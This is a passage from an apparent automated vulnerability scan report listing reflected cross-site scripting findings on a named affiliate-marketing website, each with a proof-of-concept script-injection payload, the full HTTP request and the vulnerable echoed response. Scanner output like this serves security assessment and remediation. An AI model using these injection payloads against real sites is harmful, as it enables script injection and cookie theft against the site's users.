The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0cc2"><script>alert(1)</script>b04df9313ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0cc2\"><script>alert(1)</script>b04df9313ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2"><script>alert(1)</script>b04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2\"><script>alert(1)</script>b04df9313ef=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034a"><script>alert(1)</script>761a7e15528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a034a\"><script>alert(1)</script>761a7e15528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a034a"><script>alert(1)</script>761a7e15528=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?a034a\"><script>alert(1)</script>761a7e15528=1" title="Home">
...[SNIP]...

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a43e"><script>alert(1)</script>9fec3b443df was submitted in the CMI parameter. This input was echoed as 3a43e\"><script>alert(1)</script>9fec3b443df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?CMI=13a43e"><script>alert(1)</script>9fec3b443df HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?CMI=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=13a43e\"><script>alert(1)</script>9fec3b443df" title="Home">
...[SNIP]...

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e7f5</script><script>alert(1)</script>51625b9e77d was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script>
...[SNIP]...

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907ef"><script>alert(1)</script>9ba8bab1929 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 907ef\"><script>alert(1)</script>9ba8bab1929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef"><script>alert(1)</script>9ba8bab1929 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef\"><script>alert(1)</script>9ba8bab1929" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd01"><script>alert(1)</script>7c3cf6160b7 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as bdd01\"><script>alert(1)</script>7c3cf6160b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01"><script>alert(1)</script>7c3cf6160b7 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01\"><script>alert(1)</script>7c3cf6160b7" title="Home">
...[SNIP]...

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e175"><script>alert(1)</script>d02fb3e546d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e175\"><script>alert(1)</script>d02fb3e546d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2\&8e175"><script>alert(1)</script>d02fb3e546d=1 HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2\\&8e175\"><script>alert(1)</script>d02fb3e546d=1" title="Home">
...[SNIP]...

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3533"><script>alert(1)</script>c87eee535a4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as b3533\"><script>alert(1)</script>c87eee535a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533"><script>alert(1)</script>c87eee535a4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533\"><script>alert(1)</script>c87eee535a4" title="Home">
...[SNIP]...

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d3a"><script>alert(1)</script>cdc0ff990ea was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e1d3a\"><script>alert(1)</script>cdc0ff990ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a"><script>alert(1)</script>cdc0ff990ea HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a\"><script>alert(1)</script>cdc0ff990ea" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f4f</script><script>alert(1)</script>059ba1b89e was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script>
...[SNIP]...

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79420"><script>alert(1)</script>acb62a6df93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79420\"><script>alert(1)</script>acb62a6df93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420"><script>alert(1)</script>acb62a6df93=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420\"><script>alert(1)</script>acb62a6df93=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42ccb</script><script>alert(1)</script>48b926f12c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
lar").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script>
...[SNIP]...

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931f9"><script>alert(1)</script>426411977a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 931f9\"><script>alert(1)</script>426411977a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&931f9"><script>alert(1)</script>426411977a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&931f9\"><script>alert(1)</script>426411977a5=1" title="Home">
...[SNIP]...

3.61. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e678c"><script>alert(1)</script>c2083c9f32b was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e678c\"><script>alert(1)</script>c2083c9f32b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e678c"><script>alert(1)</script>c2083c9f32b HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
